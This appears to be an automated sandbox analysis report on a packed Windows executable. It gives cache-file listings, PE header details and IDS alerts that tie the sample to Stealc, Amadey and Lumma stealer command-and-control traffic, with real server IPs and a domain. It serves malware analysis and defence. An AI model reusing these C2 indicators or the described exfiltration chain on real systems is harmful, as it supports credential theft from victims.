
Chrome Cache Entry: 562

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	175125
Entropy (8bit):	5.554368182631651
Encrypted:	false
SSDEEP:	3072:fc3bXo9SLtl9UNXr+FqVBiFWGHj4LsBUnL7BB19HD4VHDgJElS5bOFYG4bhlth0j:fc33Ltl9UhtVBi8ij4LsBU7BB19HD+Db
MD5:	DE27580D28C778BDEB06F70676896EB2
SHA1:	B4110DAAA338236B713E45FC5C7D24D37DFF8832
SHA-256:	5446EE28C1524D6D01444EE57DC4649E45BE7EDF69FD8CB317D94E7E62AD0D38
SHA-512:	26A8E77282C167A66CEAC4C015AB56814A9F96D4A26E2BA5EFC8B9ECB1B14042A1E79FEBC553F81225ABA63BF7D0713AED7299936843786BCB1ABA4C5EFD2D86
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Ed7fPZdAP88.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTsAQtU7Exa5LSjaPuQb-KRl1yfMjA"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.aj=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var bj,cj,gj,jj,ij,ej,hj;bj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};cj=function(){_.Na()};gj=function(a,b){(_.dj\|\|(_.dj=new ej)).set(a,b);(_.fj\|\|(_.fj=new ej)).set(b,a)};jj=function(a){if(hj===void 0){const b=new ij([],{});hj=Array.prototype.concat.call([],b).length===1}hj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.kj=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Gc};._.lj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.mj=function(a,b){a===0&&(a=_.lj(a,b));return a\|1};_.nj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.oj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.rj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.kj(a,b,d);var k=h[_.v]\|0,l=!!(4&k);if(!l){k=_.mj(k,b);var m=h,p=b;const q=!!(

Chrome Cache Entry: 563

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133068
Entropy (8bit):	5.4352626321685005
Encrypted:	false
SSDEEP:	3072:fkkPdsBJT7bKwkztS6STFSz1nrmjSnXYK02i6o:fHdUW5c5Sz1nKjSnoK08o
MD5:	5B4720E057EA437FE5D3B5FB25A669E8
SHA1:	4CD3C49908DFE9735DD4F3781106D7D90BC2BCD2
SHA-256:	8AF04CDCAD24ADDECA8EEABD6D502DA1D8316B0A915B7C527D47964D72A8061D
SHA-512:	8C93F1CAC38D1C53D9768F43E93794475AE3E626310FB962ED3033389718F471C07C52AC45438718715658214EAD6E604A3813C00E61CE7170A286E7A1DA653A
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 564

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1302)
Category:	downloaded
Size (bytes):	117949
Entropy (8bit):	5.4843553913091005
Encrypted:	false
SSDEEP:	3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
MD5:	A5D33473ED0997C008D1C053E0773EBE
SHA1:	FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
SHA-256:	14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
SHA-512:	3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 565

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 566

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.942172624587254
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'799'168 bytes
MD5:	f8d1d73a4b017ae508ee5172f7601906
SHA1:	6feb8b7fa058b1f818ea2b2485b8435d87b218c6
SHA256:	4688b875a5efc11c995747658f96f517bf06631e4ab4a1c05d0718abdc33e5fe
SHA512:	1365b7dda13edae170c5022828edcfd708f5378d8fc83ba07433a2094e7137c1fdf47e18bf387d481ae2610b3ce13eacd8e6e9fcb63b4423f39536c4bd631e7a
SSDEEP:	49152:zTlClKXf1sJb2d9Y2Ju9m5bqW8mMAxHU:nlC4NY+bqW1MAl
TLSH:	858533BD17AD621EDE8B33736953C104BF14BEE51C4AB530C942A7E3839A66E46D304C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa8c000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F626C709EAAh
rsqrtps xmm3, dqword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16200	d2323e745a80cbf712872c3b24c531c1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2a1000	0x200	f3062400b48421cc5e8507507b9e8df3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dhewrjwp	0x4ed000	0x19e000	0x19d600	88f45f36ee529231e721877c28487cb7	False	0.9945316043619595	data	7.95215021711601	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uaqjjwio	0x68b000	0x1000	0x600	0dd48981513f50f23e68ac9fe3bdf224	False	0.6106770833333334	data	5.228316950417364	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x68c000	0x3000	0x2200	6f3c5b7ab4eb0460339e77d47e9d0f6b	False	0.07180606617647059	DOS executable (COM)	0.8080324788091636	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-13T20:39:19.921295+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49720	185.215.113.206	80	TCP
2024-11-13T20:39:20.212619+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49720	185.215.113.206	80	TCP
2024-11-13T20:39:20.218541+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.5	49720	TCP
2024-11-13T20:39:20.502672+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49720	185.215.113.206	80	TCP
2024-11-13T20:39:20.509435+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.5	49720	TCP
2024-11-13T20:39:21.617729+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49720	185.215.113.206	80	TCP
2024-11-13T20:39:22.211828+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49720	185.215.113.206	80	TCP
2024-11-13T20:39:35.070414+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49805	TCP
2024-11-13T20:39:45.498797+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:48.844225+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:50.897626+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:51.952710+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:54.187242+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:54.835551+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:58.839057+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50022	185.215.113.16	80	TCP
2024-11-13T20:40:13.406489+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	50103	TCP
2024-11-13T20:41:05.569252+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	50138	185.215.113.43	80	TCP
2024-11-13T20:41:08.869241+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50140	87.120.125.254	80	TCP
2024-11-13T20:41:08.869241+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50140	87.120.125.254	80	TCP
2024-11-13T20:41:15.902620+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50139	TCP
2024-11-13T20:41:16.819643+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50141	185.215.113.43	80	TCP
2024-11-13T20:41:17.729253+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50142	185.215.113.16	80	TCP
2024-11-13T20:41:21.317879+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.5	55701	1.1.1.1	53	UDP
2024-11-13T20:41:22.021072+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50143	172.67.174.133	443	TCP
2024-11-13T20:41:22.021072+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50143	172.67.174.133	443	TCP
2024-11-13T20:41:22.606853+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50143	172.67.174.133	443	TCP
2024-11-13T20:41:22.606853+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50143	172.67.174.133	443	TCP
2024-11-13T20:41:22.666364+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50144	185.215.113.43	80	TCP
2024-11-13T20:41:23.583286+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50146	172.67.174.133	443	TCP
2024-11-13T20:41:23.583286+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50146	172.67.174.133	443	TCP
2024-11-13T20:41:23.615353+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50145	185.215.113.16	80	TCP
2024-11-13T20:41:24.523175+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50146	172.67.174.133	443	TCP
2024-11-13T20:41:24.523175+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50146	172.67.174.133	443	TCP
2024-11-13T20:41:25.727666+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50148	172.67.174.133	443	TCP
2024-11-13T20:41:25.727666+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50148	172.67.174.133	443	TCP
2024-11-13T20:41:26.602679+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50148	172.67.174.133	443	TCP
2024-11-13T20:41:27.684789+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50151	172.67.174.133	443	TCP
2024-11-13T20:41:27.684789+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50151	172.67.174.133	443	TCP
2024-11-13T20:41:27.883359+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50150	185.215.113.43	80	TCP
2024-11-13T20:41:28.015156+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50149	185.215.113.206	80	TCP
2024-11-13T20:41:29.950892+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50155	172.67.174.133	443	TCP
2024-11-13T20:41:29.950892+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50155	172.67.174.133	443	TCP
2024-11-13T20:41:31.938368+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50156	185.215.113.43	80	TCP
2024-11-13T20:41:32.676325+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50158	172.67.174.133	443	TCP
2024-11-13T20:41:32.676325+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50158	172.67.174.133	443	TCP
2024-11-13T20:41:32.878334+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50157	185.215.113.16	80	TCP
2024-11-13T20:41:34.137574+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50162	172.67.174.133	443	TCP
2024-11-13T20:41:34.137574+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50162	172.67.174.133	443	TCP
2024-11-13T20:41:34.953432+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50162	172.67.174.133	443	TCP
2024-11-13T20:41:34.953432+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50162	172.67.174.133	443	TCP
2024-11-13T20:41:35.223628+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50163	172.67.174.133	443	TCP
2024-11-13T20:41:35.223628+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50163	172.67.174.133	443	TCP
2024-11-13T20:41:35.230259+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50163	172.67.174.133	443	TCP
2024-11-13T20:41:35.824470+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50164	172.67.174.133	443	TCP
2024-11-13T20:41:35.824470+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50164	172.67.174.133	443	TCP
2024-11-13T20:41:36.435641+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50164	172.67.174.133	443	TCP
2024-11-13T20:41:36.435641+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50164	172.67.174.133	443	TCP
2024-11-13T20:41:37.932729+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50165	172.67.174.133	443	TCP
2024-11-13T20:41:37.932729+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50165	172.67.174.133	443	TCP
